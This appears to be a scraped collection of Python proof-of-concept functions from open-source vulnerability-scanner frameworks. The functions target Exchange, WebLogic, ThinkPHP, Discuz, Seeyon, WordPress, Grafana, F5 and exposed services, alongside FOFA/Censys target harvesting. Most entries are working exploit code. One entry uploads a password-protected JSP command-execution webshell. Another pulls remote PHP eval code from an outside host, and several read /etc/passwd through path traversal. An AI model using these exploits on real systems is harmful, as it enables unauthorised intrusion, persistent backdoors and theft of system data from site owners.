コード例 #1
0
def poc(url):
    if not url.startswith("http"):
        url = "https://" + url
    url = get_standard_url(url)
    try:
        r1 = request.get(url + "/owa",
                         timeout=5,
                         verify=False,
                         allow_redirects=False)
        # print(r1.text)
        if r1.status_code != 200:
            return False

        r2 = request.get(
            url +
            "/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]",
            timeout=5,
            verify=False,
            allow_redirects=False)
        if r2.status_code == 200 and "Exchange" in r2.text:
            return True
    except Exception as e:
        # print(e)
        pass

    return False
コード例 #2
0
def poc(url):
    # 首先对url进行处理
    # url = "http://www.example.org:7001/default.html?ct=32&op=92&item=98"
    # --> http://www.example.org:7001
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc

    # 首先判断attack_url是否可访问
    try:
        attack_url = url + '/_async/AsyncResponseService'
        r = request.get(url=attack_url,
                        headers=get_headers,
                        timeout=4,
                        verify=False)
        if r.status_code != 200:
            return []
    except:
        return []

    # 因为不知道目标是linux还是windows,所以直接都检验一遍
    # 如果存在漏洞,则将shell路径保存在webshell_path中
    webshell_path = []
    linux_check_1(url, webshell_path)
    linux_check_2(url, webshell_path)
    windows_check_1(url, webshell_path)
    windows_check_2(url, webshell_path)

    return webshell_path
コード例 #3
0
ファイル: thinkphp_rce.py プロジェクト: zuihsouse/saucerframe 
def poc(domain_url):
    try:
        # if "https://" in domain_url:
        #     protocol = "https://"
        # else:
        #     protocol = "http://"
        
        # return to top path 
        # 'https://www.xiaogeng.com.cn/admin.php?id=6'==>'https://www.xiaogeng.com.cn'
        #key_tmp  = tldextract.extract(domain_url)
        #domain_url = protocol + key_tmp.subdomain + '.' + key_tmp.domain+'.' + key_tmp.suffix 

        if "http" not in domain_url:
            domain_url = "http://" + domain_url
            

        poc0 = '/index.php/?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1'
        poc1 = '/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1'
        poc2 = '/index.php/?s=index/\\think\Request/input&filter=phpinfo&data=1'
        poc3 = '/index.php?s=/index/\\think\\request/cache&key=1|phpinfo'
        poclist = [poc0,poc1,poc2,poc3]
        headers = {
            "Accept": "*/*",
            "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.50",
            "X-Forwarded-For":"192.168.1.1"
        }
        for poc in poclist:
            r = request.get(domain_url + poc, headers=headers,verify=False, timeout =10,allow_redirects=False)
            if "PHP Version" in r.text:
                return domain_url + poc
        
        return 0
    except Exception as e:
        return 0
コード例 #4
0
ファイル: discuz_rce.py プロジェクト: zuihsouse/saucerframe 
def poc(url):
    url = get_standard_url(url)
    url = url + "/forum.php"
    try:
        r = request.get(url, timeout=5)
        tmp = re.split(" |=|,", r.headers['Set-Cookie'])
        field = [i for i in tmp if "language" in i]
        if not field:
            return False
        # print(f"{url}:{field}")
        cookie = {field[0]: "'.phpinfo().'"}
        r = request.get(url, cookies=cookie, timeout=5)
        if "PHP Version" in r.text:
            return True
    except:
        return False
コード例 #5
0
ファイル: thinkcmf_shell.py プロジェクト: r0ckysec/pocframe 
def poc(url):
    headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    }
    target = get_standard_url(url)
    url = target + url_payload
    try:
        res = request.get(url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if res.status_code == 200:
            url2 = target + "/secquan.php"
            res2 = request.get(url2, headers=headers, timeout=5, allow_redirects=False, verify=False)
            if "bug exist" in res2.text:
                return target + "/secquan.php"
    except:
        pass
    return False
コード例 #6
0
def poc(url):
    # url = "http://www.example.org:8080/default.html?ct=32&op=92&item=98"
    # --> http://www.example.org:8080
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc

    # 自定义的shell地址,内容为 <pre>eval($_REQUEST['z']);</pre>
    shellpath = "http://saucer-man.com/aa.txt"
    # 执行的shell命令
    shell = "phpinfo();"

    vulnurl = url + "/wp-admin/admin-post.php?swp_debug=load_options&swp_url={shellpath}&z={shell}".format(
        shellpath=shellpath, shell=shell)
    try:
        print(vulnurl)
        headers = {"User-Agent": get_random_ua()}
        r = request.get(vulnurl,
                        headers=headers,
                        timeout=5,
                        verify=False,
                        allow_redirects=False)
        print(r.status_code)
        print(r.headers)
        print(r.text)
        if r.status_code == 200 and "PHP Version" in r.text:
            return vulnurl
        else:
            return False
    except:
        return False
コード例 #7
0
def poc(url):
    # url = "www.example.org/default.html?ct=32&op=92&item=98"
    # --> http://www.example.org
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc
    headers = {
        "User-Agent":get_random_ua()
        }
    
    # shell_name can modify it yourself
    shell_name="config_db1.jsp"

    shell_url = url + "/seeyon/" + shell_name

    try:
        # just prevent being attacked
        res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if res.status_code == 200 and ":-)" in res.text:
            return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    except:
        pass

    shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name
    # def_shell content can modufy iy youself
    def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>"""
    def_shell = def_shell.encode()
    base_header = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkZUFENXlSUUh3TG9pcVJqaWRnNjYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo="

    payload_head_len = 283 + len(f_base64encode(shell_name))
    payload_shell_len = len(def_shell)
    payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8')
    payload_shell_name = f_base64encode(shell_name)
    payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str(
        payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66',
                                    payload_shell_name), 'utf-8') + payload_shell
    try:
        request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False)
        res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text
    except:
        return False

    if ":-)" in res:
        return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    else:
        return False
コード例 #8
0
ファイル: fofa.py プロジェクト: m09046105/xiaoyi 
def handle_fofa(query, limit, offset=0):
    try:
        msg = '[+] Trying to login with credentials in config file: {}.'.format(
            paths.CONFIG_PATH)
        colorprint.green(msg)
        email = ConfigFileParser().fofa_email()
        key = ConfigFileParser().fofa_key()
        #print(key)
        if check(email, key):
            pass
        else:
            raise Exception(
                "Automatic authorization failed")  # will go to except block
    except Exception as e:
        logger.debug(e)
        msg = '[*] Automatic authorization failed.'
        colorprint.cyan(msg)
        msg = '[*] Please input your FoFa Email and API Key below.'
        colorprint.cyan(msg)
        email = input("[*] Fofa Email: ").strip()
        key = input('[*] Fofa API Key: ').strip()
        if not check(email, key):
            msg = '[-] Fofa API authorization failed, Please re-run it and enter a valid key.'
            colorprint.red(msg)
            sys.exit()

    query = base64.b64encode(query.encode('utf-8')).decode('utf-8')

    # count how many result to search
    size = limit + offset

    url = f"https://fofa.so/api/v1/search/all?email={email}&key={key}&qbase64={query}&size={size}"
    try:
        response = request.get(url).text
        resp = json.loads(response)
        if not resp["error"]:
            for item in resp.get('results')[offset:]:
                #print(type(item[0]))
                if 'https:' not in item[0]:
                    try:
                        requests.get("http://" + item[0],
                                     timeout=5,
                                     verify=False)
                        conf.target.add("http://" + item[0])
                        print("http://" + item[0])
                    except:
                        pass

                else:
                    try:
                        requests.get(item[0], timeout=5, verify=False)
                        conf.target.add(item[0])
                        print(item[0])
                    except:
                        pass

    except Exception as e:
        colorprint.red(e)
        sys.exit()
コード例 #9
0
def jupyter(host, result, ports=[8888]):
    for port in ports:
        try:
            r = request.get(f"http://{host}:{port}", timeout=5, verify=False)
            if "clusters" in r.text:
                result.append(f"jupyter: {host}:{port}")
        except:
            pass
コード例 #10
0
ファイル: unauth.py プロジェクト: huangyuan666/saucerframe 
def elasticsearch(host, result, ports = [9200]):
    for port in ports:
        try:
            r = request.get(f"http://{host}:{port}", timeout=5, allow_redirects=False, verify=False)
            if "elasticsearch" in r.text:
                result.append(f"elasticsearch: {host}:{port}")
        except:
            pass
コード例 #11
0
ファイル: unauth.py プロジェクト: huangyuan666/saucerframe 
def hadoop(host, result, ports=[8088]):
    for port in ports:
        try:
            r = request.get(f"http://{host}:{port}/cluster", timeout=5, allow_redirects=False, verify=False)
            if "Hadoop" in r.text:
                result.append(f"hadoop: {host}:{port}")
        except:
            pass
コード例 #12
0
ファイル: unauth.py プロジェクト: huangyuan666/saucerframe 
def genkins(host, result, ports=[8080]):
    for port in ports:
        try:
            payload = f"http://{host}:{port}/manage"
            r = request.get(payload, timeout=5, allow_redirects=False, verify=False)
            if "genkins" in r.text:
                result.append(f"genkins: {payload}")
        except:
            pass
コード例 #13
0
ファイル: unauth.py プロジェクト: huangyuan666/saucerframe 
def docker(host, result, ports=[2375]):
    # exp: https://github.com/Tycx2ry/docker_api_vul
    for port in ports:
        try:
            r = request.get(f"http://{host}:{port}/version", timeout=5, verify=False)
            if "ApiVersion" in r.text:
                result.append(f"docker: {host}:{port}")
        except:
            pass
コード例 #14
0
ファイル: unauth.py プロジェクト: huangyuan666/saucerframe 
def couchdb(host, result, ports=[5984]):
    for port in ports:
        try:
            url = f"http://{host}:{port}"
            r = request.get(url, timeout=5, allow_redirects=False, verify=False)
            if "couchdb" in r.text:
                result.append(f"couchdb: {host}:{port}")
        except:
            pass
コード例 #15
0
ファイル: dahua.py プロジェクト: saucer-man/saucerframe 
def poc(url):
    url = get_standard_url(url)
    try:
        r = request.get(f"{url}/current_config/passwd", timeout=10)
        if r.status_code == 200 and "name:passwd" in r.text:
            return True
    except:
        pass
    return False
コード例 #16
0
ファイル: unauth.py プロジェクト: huangyuan666/saucerframe 
def jboss(host, result, ports=[8080]):
    for port in ports:
        try:
            payload = f"http://{host}:{port}/jmx-console/"
            r = request.get(payload, timeout=5, allow_redirects=False, verify=False)
            if "jboss" in r.text:
                result.append(f"jboss: {payload}")
        except:
            pass
コード例 #17
0
def poc(url):
    url = get_standard_url(url)
    url = url + "/debug.php"
    try:
        r = request.get(url, timeout=5)
        if r.status_code == 200:
            return True
    except:
        pass
    return False
コード例 #18
0
def poc(url):
    try:
        payload = f"{get_standard_url(url)}/manage"
        r = request.get(payload, allow_redirects=False, verify=False)
        if "genkins" in r.text:
            return True
    except:
        # traceback.print_exc()
        pass
    return False
コード例 #19
0
ファイル: fofa.py プロジェクト: r0ckysec/pocframe 
def check(email, key):  # verify email and key
    if email and key:
        auth_url = "https://fofa.so/api/v1/info/my?email={0}&key={1}".format(email, key)
        try:
            response = request.get(auth_url)
            if response.status_code == 200:
                return True
        except Exception as e:
            logger.debug(e)
            return False
    return False
コード例 #20
0
def poc(url):
    base = get_standard_url(url)
    vuln_url = f"{base}/mgmt/shared/authn/login"
    try:
        r = request.get(vuln_url, verify=False, timeout=5)
        json.loads(r.text)
        if "resterrorresponse" in r.text or "message" in r.text:
            return vuln_url
    except:
        pass
    return False
コード例 #21
0
def poc(url):
    vuln_url = f"{get_standard_url(url)}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
    try:
        r = request.get(vuln_url,
                        verify=False,
                        allow_redirects=False,
                        timeout=5)
        if r.status_code == 200 and "root:x:" in r.text:
            return vuln_url
    except:
        pass
    return False
コード例 #22
0
def poc(url):
    url = get_standard_url(url)
    path = url + "/graph_realtime.php?action=init"
    try:
        # print(path)
        req = request.get(path, timeout=5)
        if req.status_code == 200 and "poller_realtime.php" in req.text:
            return True
        else:
            return False
    except:
        return False
コード例 #23
0
def poc(url):
    headers = {
    "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    payload = "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"
    vulnurl = url + payload
    try:
        req = request.get(vulnurl, headers=headers, timeout=10)
        if r"weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and r"IO Exception on sendMessage" not in req.text:
            return True
        else:
            return False
    except:
        return False
コード例 #24
0
ファイル: zoomeye.py プロジェクト: m09046105/xiaoyi 
    def resources_info(self):
        """Resource info shows us available search times.

        host-search: total number of available host records to search
        web-search: total number of available web records to search
        """
        data = None
        zoomeye_api = "https://api.zoomeye.org/resources-info"
        headers = {'Authorization': 'JWT %s' % self.token}
        resp = request.get(zoomeye_api, headers=headers)
        if resp and resp.status_code == 200 and 'plan' in resp.json():
            data = resp.json()

        return data
コード例 #25
0
ファイル: censys.py プロジェクト: r0ckysec/pocframe 
def can_auto_login():
    if UID and SECRET:
        try:
            res = request.get(API_URL + "/data",
                              auth=(UID, SECRET),
                              timeout=10)
            if res.status_code != 200:
                raise SystemExit
            else:
                return True
        except:
            return False
    else:
        return False
コード例 #26
0
def poc(url):
    # url = "http://www.example.org/default.html?ct=32&op=92&item=98"
    # --> http://www.example.org
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc + payload
    try:
        req = request.get(url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if req.status_code == 200 and "database" in req.text.lower():
            return url
        else:
            return False
    except:
        return False
コード例 #27
0
def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    o = urlparse(url)
    port = o.port if o.port else 8081
    try:
        target = f"{o.scheme}://{o.hostname}:{port}"
        # print(target)
        res = request.get(url=target, timeout=5)
        if "apache flink" in res.text.lower():
            return True
        else:
            return False
    except:
        return False
コード例 #28
0
def bak_scan(url, payloads, result):
    headers = {"User-Agent": get_random_ua()}
    while not payloads.empty():
        payload = payloads.get()
        vulnurl = url + "/" + payload
        try:
            flag = 0
            # 如果是备份文件则不需要下载,只需要head方法获取头部信息即可,否则文件较大会浪费大量的时间
            if 'zip' in payload or 'rar' in payload or 'gz' in payload or 'sql' in payload:
                req = request.head(vulnurl,
                                   headers=headers,
                                   timeout=5,
                                   allow_redirects=False,
                                   verify=False)
                # 404页面 'Content-Type': 'application/octet-stream',
                # zip 'application/x-zip-compressed' 'application/zip'
                # rar 'application/octet-stream'  'application/x-rar-compressed'
                # 采用Content-Type过滤,还是有一定误报
                if req.status_code == 200:
                    if 'html' not in req.headers[
                            'Content-Type'] and 'image' not in req.headers[
                                'Content-Type']:
                        flag = 1
            # 当检验git和svn、hg时则需要验证返回内容,get方法
            else:
                req = request.get(vulnurl,
                                  headers=headers,
                                  timeout=5,
                                  verify=False,
                                  allow_redirects=False)
                if req.status_code == 200:
                    if 'svn' in payload:
                        if 'dir' in req.text and 'svn' in req.text:
                            flag = 1
                    elif 'git' in payload:
                        if 'repository' in req.text:
                            flag = 1
                    elif 'hg' in payload:
                        if 'hg' in req.text:
                            flag = 1
                    elif '/WEB-INF/web.xml' in payload:
                        if 'web-app' in req.text:
                            flag = 1
            if flag == 1:
                result.append(vulnurl)
        except Exception as e:
            # print(e)
            continue
コード例 #29
0
def can_auto_login():
    if UID and SECRET:
        msg = '[+] Trying to login with credentials in config file: %s.' % paths.CONFIG_PATH
        print(msg)
        try:
            res = request.get(API_URL + "/data",
                              auth=(UID, SECRET),
                              timeout=10)
            if res.status_code != 200:
                raise SystemExit
            else:
                return True
        except:
            return False
    else:
        return False
コード例 #30
0
def poc(url):
    plugins = [
        "cloudwatch", "dashlist", "elasticsearch", "graph", "graphite",
        "heatmap", "influxdb", "mysql", "opentsdb", "pluginlist", "postgres",
        "prometheus", "stackdriver", "table", "text"
    ]
    base = get_standard_url(url)
    for plugin in plugins:
        vuln_url = f"{base}/public/plugins/{plugin}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd"
        try:
            r = request.get(vuln_url, verify=False, timeout=5)
            if r.status_code == 200 and "root:x:" in r.text:
                return vuln_url
        except:
            pass
    return False